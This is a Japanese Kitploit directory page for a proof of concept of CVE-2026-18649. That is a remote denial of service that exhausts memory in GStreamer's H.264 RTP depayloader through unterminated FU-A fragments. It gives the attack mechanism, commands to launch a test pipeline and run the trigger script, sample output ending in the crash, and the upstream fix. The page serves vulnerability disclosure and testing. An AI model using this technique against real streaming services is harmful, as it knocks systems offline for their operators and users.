Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-18649 — CVE-2026-18649の概念実証。GStreamerのH.264 RTPデペイローダー(rtph264depay)におけるリモートサービス拒否の脆弱性です。 | Kitploit
ツール/GitHubGitHub/0xsemizzz/cve-2026-18649
ペイロード生成脆弱性分析エクスプロイトネットワークセキュリティ
GitHub0xsemizzz/cve-2026-18649

CVE-2026-18649

CVE-2026-18649の概念実証。GStreamerのH.264 RTPデペイローダー(rtph264depay)におけるリモートサービス拒否の脆弱性です。

リポジトリを見る
121ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-18649 - GStreamer rtph264depay 無制限メモリ増加 DoS

GStreamer の H.264 RTP デペイローダー(rtph264depay)におけるリソース枯渇脆弱性の概念実証。同じパターンは rtph265depay にも影響します。

概要

H.264 FU-A フラグメント化 RTP の再構築中、各受信フラグメントはサイズ上限なしで内部の GstAdapter バッファにプッシュされます。アダプタは FU ヘッダのフラグメント終端(E)ビットが設定されたときだけフラッシュされます。リモート攻撃者は、有効な開始フラグメントを1つ送信した後、E ビットを決して設定せずに継続フラグメントを無限に送信します。バッファはプロセスのメモリが尽きてクラッシュするまで増加し続けます。

  • リモートから、認証不要
  • 有効な RTP パケットのみを使用し、不正なデータは一切使わない
  • 1つのストリームで十分。フラッディングや複数接続は不要

CVE 詳細

  • CVE: CVE-2026-18649(NVD)
  • CWE: CWE-770(限度またはスロットリングなしの割り当て)
  • CVSS: 7.5 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)
  • 発見者: Yehia Ali Mohamed Ezzat(0xsemizzz)

完全なレポート: 0xsemizzz.vercel.app/projects/gstreamer-cve

影響を受けるバージョン

上流の修正前の gst-plugins-good。1.28.2(Ubuntu 24.04)で確認済み。

クイックスタート

パイプラインを起動してから PoC を実行します:

root@kitploit:~
gst-launch-1.0 udpsrc port=5036 buffer-size=4194304 \
  caps="application/x-rtp,media=video,payload=96,clock-rate=90000,encoding-name=H264" \
  ! rtph264depay ! fakesink &
PID=$!
python3 trigger.py 5036 $PID

高速にクラッシュさせるには、メモリ上限を追加します:

root@kitploit:~
ulimit -v 262144   # 256 MB、プロセスは約12秒で停止
gst-launch-1.0 udpsrc port=5036 buffer-size=4194304 \
  caps="application/x-rtp,media=video,payload=96,clock-rate=90000,encoding-name=H264" \
  ! rtph264depay ! fakesink &
python3 trigger.py 5036 $!

期待される出力

root@kitploit:~
[*] port=5036  1 fragment every 0.5ms  (~2.8 MB/s)
[*] monitoring VmData (heap), not RSS
[*] target PID=12345  baseline VmData=26 MB

      5000 frags  ~     7 MB sent  |  VmData=35MB (+8MB)
     10000 frags  ~    13 MB sent  |  VmData=44MB (+17MB)
     15000 frags  ~    20 MB sent  |  VmData=53MB (+26MB)
     20000 frags  ~    27 MB sent  |  VmData=62MB (+35MB)
     25000 frags  ~    33 MB sent  |  VmData=71MB (+44MB)
     30000 frags  ~    40 MB sent  |  VmData=79MB (+53MB)
     ...
     DEAD

修正内容

rtph264depay と rtph265depay に max-reassembly-size プロパティが追加されました。アプリケーションはこれを妥当な値(ビデオでは通常 16 MB)に設定する必要があります。後方互換性のためデフォルトは 0(無制限)です。

ツールをダウンロード